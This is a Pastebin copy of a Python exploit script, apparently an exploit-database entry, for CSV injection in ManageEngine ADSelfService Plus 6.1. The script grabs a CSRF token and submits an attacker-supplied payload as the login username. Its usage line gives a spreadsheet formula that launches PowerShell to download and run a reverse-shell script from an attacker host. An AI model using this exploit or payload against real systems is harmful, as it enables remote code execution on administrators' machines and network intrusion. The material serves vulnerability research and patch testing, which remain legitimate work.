Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Exploit Title: ManageEngine ADSelfService Plus 6.1 - CSV Injection
- # Date: 19/05/2021
- # Exploit Author: Metin Yunus Kandemir
- # Vendor Homepage: https://www.manageengine.com/
- # Software Link: https://www.manageengine.com/products/self-service-password/download.html
- # Version: 6.1
- # Description: https://docs.unsafe-inline.com/0day/manageengine-adselfservice-plus-6.1-csv-injection
- import requests
- import sys
- import urllib3
- def loginReq(target,payload,getCsrf):
- s = requests.Session()
- data = {
- "j_username": payload,
- "j_password": "joker",
- "domainName": "ADSelfService+Plus+Authentication",
- "AUTHRULE_NAME": "ADAuthenticator",
- "adscsrf": getCsrf
- }
- url = "https://"+target+"/j_security_check"
- req = s.post(url, data=data, allow_redirects=False, verify=False)
- if req.status_code == 302:
- print("[+] Sending request is successful.")
- print("[+] Injected payload: %s" %payload)
- else:
- print("[-] Something went wrong!")
- print(req.status_code)
- def getCsrfToken(target, payload=None):
- urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
- gUrl = "https://" + target + "/authorization.do"
- getCsrf = requests.get(url=gUrl, allow_redirects=False, verify=False)
- print("[*] Csrf token: %s" %getCsrf.cookies['_zcsr_tmp'])
- loginReq(target,payload,getCsrf)
- def main(args):
- if len(args) != 3:
- print("usage: %s targetIp:port payload" %(args[0]))
- print("Example: python3 adSelfServiceCsv.py 192.168.1.253:9251 \"=cmd|'/C powershell.exe -c iex (New-Object Net.WebClient).DownloadString('http://ATTACKER-IP/Invoke-PowerShellTcp.ps1')'!A0\"")
- sys.exit(1)
- getCsrfToken(target=args[1], payload=args[2])
- if __name__ == "__main__":
- main(args=sys.argv)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
